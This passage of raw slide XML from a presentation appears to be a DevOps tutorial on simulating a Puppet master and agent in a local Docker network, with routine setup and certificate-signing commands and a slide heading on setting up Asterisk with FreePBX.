            <a:endParaRPr b="1" sz="5300">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3665" name="Google Shape;3665;p591"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="12695" l="5358" r="15130" t="10829"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3222650" y="2499525"/>
            <a:ext cx="3277375" cy="2266250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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9" name="Shape 3669"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3670" name="Google Shape;3670;p592"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1059450" y="132025"/>
            <a:ext cx="7232448" cy="4902124"/>
            <a:chOff x="1059450" y="132025"/>
            <a:chExt cx="7232448" cy="4902124"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3671" name="Google Shape;3671;p592"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="2240" l="9586" r="7198" t="-2240"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1059450" y="145275"/>
              <a:ext cx="7232448" cy="4888874"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3672" name="Google Shape;3672;p592"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1217275" y="132025"/>
              <a:ext cx="6972600" cy="8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dk2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Puppet Master Agent Simulation </a:t>
              </a:r>
              <a:endParaRPr b="1" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="en" sz="2500">
                  <a:solidFill>
                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>using Local Docker Network</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3673" name="Google Shape;3673;p592"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="20838" l="28408" r="29690" t="19003"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4778013" y="1731325"/>
              <a:ext cx="668071" cy="719450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3674" name="Google Shape;3674;p592"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="20838" l="28408" r="29690" t="19003"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5078963" y="2450763"/>
              <a:ext cx="668071" cy="719450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3675" name="Google Shape;3675;p592"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="20838" l="28408" r="29690" t="19003"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4869263" y="3195963"/>
              <a:ext cx="668071" cy="719450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3676" name="Google Shape;3676;p592"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4989750" y="2248900"/>
              <a:ext cx="16866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6FC0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Docker Network</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3677" name="Google Shape;3677;p592"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4268750" y="3836575"/>
              <a:ext cx="16866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6FC0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Docker Network</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3678" name="Google Shape;3678;p592"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4943550" y="3042738"/>
              <a:ext cx="16866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6FC0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Docker Network</a:t>
              </a:r>
              <a:endParaRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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2" name="Shape 3682"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3683" name="Google Shape;3683;p593"/>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Simulate a Puppet Master Agent on local docker</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3684" name="Google Shape;3684;p593"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1830600" y="4092875"/>
            <a:ext cx="5482800" cy="7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2500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Repo Link</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3685" name="Google Shape;3685;p593"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1633900" y="1017725"/>
            <a:ext cx="5482800" cy="7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2500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Puppet Server Source</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3686" name="Google Shape;3686;p593"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192000" y="1782000"/>
            <a:ext cx="8760000" cy="17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Create a local network</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ocker network create puppet_network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker network ls</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Find the IP</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' puppet_server_container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Eg. 172.18.0.2</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Put the ip in the PuppetAgent Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3687" name="Google Shape;3687;p593"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1964425" y="3507300"/>
            <a:ext cx="5482800" cy="716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2500" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Puppet Agent Source</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1502" l="13396" r="14192" t="22225"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1263700" y="3158725"/>
            <a:ext cx="10026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HOST1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6796525" y="3158725"/>
            <a:ext cx="10026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HOST2</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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1" name="Shape 3691"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3692" name="Google Shape;3692;p59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Master Side</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3693" name="Google Shape;3693;p5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6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>puppetserver ca list --all</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>puppetserver ca sign --all</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo tail -f /var/log/puppetlabs/puppetserver/puppetserver.log</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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7" name="Shape 3697"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3698" name="Google Shape;3698;p59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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Agent Side:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3699" name="Google Shape;3699;p5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6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>puppet agent --test</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo puppet agent --configprint hostcert</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo puppet agent -t</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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3" name="Shape 3703"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3704" name="Google Shape;3704;p596"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441675" y="2034475"/>
            <a:ext cx="8520600" cy="12543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rgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Puppet manifest file is created on Puppet master</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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8" name="Shape 3708"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3709" name="Google Shape;3709;p597"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2531" l="0" r="0" t="4756"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280875" y="633400"/>
            <a:ext cx="6713901" cy="3667274"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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3" name="Shape 3713"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3714" name="Google Shape;3714;p598"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305950" y="689100"/>
            <a:ext cx="8606400" cy="8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600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Setup Asterisk With FreePBX</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3715" name="Google Shape;3715;p598"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="208150" y="2081750"/>
            <a:ext cx="4453350" cy="2627475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
